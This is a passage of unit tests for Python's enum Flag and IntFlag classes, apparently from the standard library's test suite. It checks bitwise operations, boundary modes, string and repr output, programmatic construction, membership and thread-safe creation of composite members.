self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_boundary(self):
self.assertIs(enum.Flag._boundary_, STRICT)
class Iron(Flag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(Flag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(Flag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
class Bizarre(Flag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 7', Iron, 7)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
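# Note on the boundary= behaviors exercised above: STRICT (the Flag default here)
# rejects values containing unknown bits, CONFORM silently drops the unknown bits,
# EJECT hands back a plain int instead of a Flag member, and KEEP stores the extra
# bits in the member's value.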
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programmatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programmatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'BLACK' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RO' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
1 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum members before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
self.assertFalse('BLACK' in Color)
self.assertFalse('RO' in Open)
self.assertTrue(1 in Color)
self.assertTrue(1 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_number_reset_and_order_cleanup(self):
class Confused(Flag):
_order_ = 'ONE TWO FOUR DOS EIGHT SIXTEEN'
ONE = auto()
TWO = auto()
FOUR = auto()
DOS = 2
EIGHT = auto()
SIXTEEN = auto()
self.assertEqual(
list(Confused),
[Confused.ONE, Confused.TWO, Confused.FOUR, Confused.EIGHT, Confused.SIXTEEN])
self.assertIs(Confused.TWO, Confused.DOS)
self.assertEqual(Confused.DOS._value_, 2)
self.assertEqual(Confused.EIGHT._value_, 8)
self.assertEqual(Confused.SIXTEEN._value_, 16)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that all 256 values were seen: the 8 canonical members plus 248 composite members
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
def test_init_subclass(self):
class MyEnum(Flag):
def __init_subclass__(cls, **kwds):
super().__init_subclass__(**kwds)
self.assertFalse(cls.__dict__.get('_test', False))
cls._test1 = 'MyEnum'
#
class TheirEnum(MyEnum):
def __init_subclass__(cls, **kwds):
super(TheirEnum, cls).__init_subclass__(**kwds)
cls._test2 = 'TheirEnum'
class WhoseEnum(TheirEnum):
def __init_subclass__(cls, **kwds):
pass
class NoEnum(WhoseEnum):
ONE = 1
self.assertEqual(TheirEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test1'], 'MyEnum')
self.assertEqual(WhoseEnum.__dict__['_test2'], 'TheirEnum')
self.assertFalse(NoEnum.__dict__.get('_test1', False))
self.assertFalse(NoEnum.__dict__.get('_test2', False))
#
class OurEnum(MyEnum):
def __init_subclass__(cls, **kwds):
cls._test2 = 'OurEnum'
class WhereEnum(OurEnum):
def __init_subclass__(cls, **kwds):
pass
class NeverEnum(WhereEnum):
ONE = 1
self.assertEqual(OurEnum.__dict__['_test1'], 'MyEnum')
self.assertFalse(WhereEnum.__dict__.get('_test1', False))
self.assertEqual(WhereEnum.__dict__['_test2'], 'OurEnum')
self.assertFalse(NeverEnum.__dict__.get('_test1', False))
self.assertFalse(NeverEnum.__dict__.get('_test2', False))
def test_default_missing(self):
with self.assertRaisesRegex(
ValueError,
"'RED' is not a valid TestFlag.Color",
) as ctx:
self.Color('RED')
self.assertIs(ctx.exception.__context__, None)
P = Flag('P', 'X Y')
with self.assertRaisesRegex(ValueError, "'X' is not a valid P") as ctx:
P('X')
self.assertIs(ctx.exception.__context__, None)
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
ROJO = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
WHITE = RED|GREEN|BLUE
BLANCO = RED|GREEN|BLUE
class Skip(IntFlag):
FIRST = 1
SECOND = 2
EIGHTH = 8
def test_type(self):
Perm = self.Perm
self.assertTrue(Perm._member_type_ is int)
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'R')
self.assertEqual(str(Perm.W), 'W')
self.assertEqual(str(Perm.X), 'X')
self.assertEqual(str(Perm.R | Perm.W), 'R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'R|W|X')
self.assertEqual(str(Perm.R | 8), '12')
self.assertEqual(str(Perm(0)), 'Perm(0)')
self.assertEqual(str(Perm(8)), '8')
self.assertEqual(str(~Perm.R), 'W|X')
self.assertEqual(str(~Perm.W), 'R|X')
self.assertEqual(str(~Perm.X), 'R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm(0)')
self.assertEqual(str(~(Perm.R | 8)), '-13')
self.assertEqual(str(Perm(~0)), 'R|W|X')
self.assertEqual(str(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(str(Open.RO), 'RO')
self.assertEqual(str(Open.WO), 'WO')
self.assertEqual(str(Open.AC), 'AC')
self.assertEqual(str(Open.RO | Open.CE), 'CE')
self.assertEqual(str(Open.WO | Open.CE), 'WO|CE')
self.assertEqual(str(Open(4)), '4')
self.assertEqual(str(~Open.RO), 'WO|RW|CE')
self.assertEqual(str(~Open.WO), 'RW|CE')
self.assertEqual(str(~Open.AC), 'CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'RW')
self.assertEqual(str(Open(~4)), '-5')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), 'Perm.R')
self.assertEqual(repr(Perm.W), 'Perm.W')
self.assertEqual(repr(Perm.X), 'Perm.X')
self.assertEqual(repr(Perm.R | Perm.W), 'Perm.R|Perm.W')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm.R | 8), '12')
self.assertEqual(repr(Perm(0)), '0x0')
self.assertEqual(repr(Perm(8)), '8')
self.assertEqual(repr(~Perm.R), 'Perm.W|Perm.X')
self.assertEqual(repr(~Perm.W), 'Perm.R|Perm.X')
self.assertEqual(repr(~Perm.X), 'Perm.R|Perm.W')
self.assertEqual(repr(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '0x0')
self.assertEqual(repr(~(Perm.R | 8)), '-13')
self.assertEqual(repr(Perm(~0)), 'Perm.R|Perm.W|Perm.X')
self.assertEqual(repr(Perm(~8)), '-9')
Open = self.Open
self.assertEqual(repr(Open.RO), 'Open.RO')
self.assertEqual(repr(Open.WO), 'Open.WO')
self.assertEqual(repr(Open.AC), 'Open.AC')
self.assertEqual(repr(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(repr(Open.WO | Open.CE), 'Open.WO|Open.CE')
self.assertEqual(repr(Open(4)), '4')
self.assertEqual(repr(~Open.RO), 'Open.WO|Open.RW|Open.CE')
self.assertEqual(repr(~Open.WO), 'Open.RW|Open.CE')
self.assertEqual(repr(~Open.AC), 'Open.CE')
self.assertEqual(repr(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(repr(~(Open.WO | Open.CE)), 'Open.RW')
self.assertEqual(repr(Open(~4)), '-5')
def test_global_repr_keep(self):
self.assertEqual(
repr(HeadlightsK(0)),
'%s.OFF_K' % SHORT_MODULE,
)
self.assertEqual(
repr(HeadlightsK(2**0 + 2**2 + 2**3)),
'%(m)s.LOW_BEAM_K|%(m)s.FOG_K|0x8' % {'m': SHORT_MODULE},
)
self.assertEqual(
repr(HeadlightsK(2**3)),
'%(m)s.HeadlightsK(0x8)' % {'m': SHORT_MODULE},
)
def test_global_repr_conform1(self):
self.assertEqual(
repr(HeadlightsC(0)),
'%s.OFF_C' % SHORT_MODULE,
)
self.assertEqual(
repr(HeadlightsC(2**0 + 2**2 + 2**3)),
'%(m)s.LOW_BEAM_C|%(m)s.FOG_C' % {'m': SHORT_MODULE},
)
self.assertEqual(
repr(HeadlightsC(2**3)),
'%(m)s.OFF_C' % {'m': SHORT_MODULE},
)
def test_format(self):
Perm = self.Perm
self.assertEqual(format(Perm.R, ''), '4')
self.assertEqual(format(Perm.R | Perm.X, ''), '5')
#
class NewPerm(IntFlag):
R = 1 << 2
W = 1 << 1
X = 1 << 0
def __str__(self):
return self._name_
self.assertEqual(format(NewPerm.R, ''), 'R')
self.assertEqual(format(NewPerm.R | Perm.X, ''), 'R|X')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i | j, i.value | j.value)
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for j in range(8):
self.assertEqual(i | j, i.value | j)
self.assertEqual((i | j).value, i.value | j)
self.assertIs(type(i | j), Perm)
self.assertEqual(j | i, j | i.value)
self.assertEqual((j | i).value, j | i.value)
self.assertIs(type(j | i), Perm)
for i in Perm:
self.assertIs(i | i, i)
self.assertIs(i | 0, i)
self.assertIs(0 | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual(i & j, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertEqual((i & j).value, i.value & j.value, 'i is %r, j is %r' % (i, j))
self.assertIs(type(i & j), Perm, 'i is %r, j is %r' % (i, j))
for j in range(8):
self.assertEqual(i & j, i.value & j)
self.assertEqual((i & j).value, i.value & j)
self.assertIs(type(i & j), Perm)
self.assertEqual(j & i, j & i.value)
self.assertEqual((j & i).value, j & i.value)
self.assertIs(type(j & i), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & 7, i)
self.assertIs(7 & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual(i ^ j, i.value ^ j.value)
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for j in range(8):
self.assertEqual(i ^ j, i.value ^ j)
self.assertEqual((i ^ j).value, i.value ^ j)
self.assertIs(type(i ^ j), Perm)
self.assertEqual(j ^ i, j ^ i.value)
self.assertEqual((j ^ i).value, j ^ i.value)
self.assertIs(type(j ^ i), Perm)
for i in Perm:
self.assertIs(i ^ 0, i)
self.assertIs(0 ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertEqual(~i, (~i).value)
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_boundary(self):
self.assertIs(enum.IntFlag._boundary_, EJECT)
class Iron(IntFlag, boundary=STRICT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Iron._boundary_, STRICT)
#
class Water(IntFlag, boundary=CONFORM):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Water._boundary_, CONFORM)
#
class Space(IntFlag, boundary=EJECT):
ONE = 1
TWO = 2
EIGHT = 8
self.assertIs(Space._boundary_, EJECT)
#
#
class Bizarre(IntFlag, boundary=KEEP):
b = 3
c = 4
d = 6
#
self.assertRaisesRegex(ValueError, 'invalid value: 5', Iron, 5)
#
self.assertIs(Water(7), Water.ONE|Water.TWO)
self.assertIs(Water(~9), Water.TWO)
#
self.assertEqual(Space(7), 7)
self.assertTrue(type(Space(7)) is int)
#
self.assertEqual(list(Bizarre), [Bizarre.c])
self.assertIs(Bizarre(3), Bizarre.b)
self.assertIs(Bizarre(6), Bizarre.d)
def test_iter(self):
Color = self.Color
Open = self.Open
self.assertEqual(list(Color), [Color.RED, Color.GREEN, Color.BLUE])
self.assertEqual(list(Open), [Open.WO, Open.RW, Open.CE])
def test_programatic_function_string(self):
Perm = IntFlag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = IntFlag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = IntFlag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = IntFlag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = IntFlag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e, v)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_empty_list(self):
Perm = enum.IntFlag('Perm', [])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', [])
lst = list(Thing)
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
def test_programatic_function_from_empty_tuple(self):
Perm = enum.IntFlag('Perm', ())
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 0, Perm)
Thing = enum.Enum('Thing', ())
self.assertEqual(len(lst), len(Thing))
self.assertEqual(len(Thing), 0, Thing)
@unittest.skipIf(
python_version >= (3, 12),
'__contains__ now returns True/False for all inputs',
)
def test_contains_er(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertFalse(Color.GREEN in Open)
self.assertFalse(Open.RW in Color)
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'GREEN' in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
'RW' in Open
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Color
with self.assertRaises(TypeError):
with self.assertWarns(DeprecationWarning):
2 in Open
@unittest.skipIf(
python_version < (3, 12),
'__contains__ only works with enum members before 3.12',
)
def test_contains_tf(self):
Open = self.Open
Color = self.Color
self.assertTrue(Color.GREEN in Color)
self.assertTrue(Open.RW in Open)
self.assertTrue(Color.GREEN in Open)
self.assertTrue(Open.RW in Color)
self.assertFalse('GREEN' in Color)
self.assertFalse('RW' in Open)
self.assertTrue(2 in Color)
self.assertTrue(2 in Open)
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
with self.assertRaises(TypeError):
self.assertFalse('test' in RW)
def test_member_iter(self):
Color = self.Color
self.assertEqual(list(Color.BLACK), [])
self.assertEqual(list(Color.PURPLE), [Color.RED, Color.BLUE])
self.assertEqual(list(Color.BLUE), [Color.BLUE])
self.assertEqual(list(Color.GREEN), [Color.GREEN])
self.assertEqual(list(Color.WHITE), [Color.RED, Color.GREEN, Color.BLUE])
def test_member_length(self):
self.assertEqual(self.Color.__len__(self.Color.BLACK), 0)
self.assertEqual(self.Color.__len__(self.Color.GREEN), 1)
self.assertEqual(self.Color.__len__(self.Color.PURPLE), 2)
self.assertEqual(self.Color.__len__(self.Color.BLANCO), 3)
def test_aliases(self):
Color = self.Color
self.assertEqual(Color(1).name, 'RED')
self.assertEqual(Color['ROJO'].name, 'RED')
self.assertEqual(Color(7).name, 'WHITE')
self.assertEqual(Color['BLANCO'].name, 'WHITE')
self.assertIs(Color.BLANCO, Color.WHITE)
Open = self.Open
self.assertIs(Open['AC'], Open.AC)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'BLUE')
class Color(AllMixin, StrMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, IntFlag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@threading_helper.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(IntFlag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with threading_helper.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
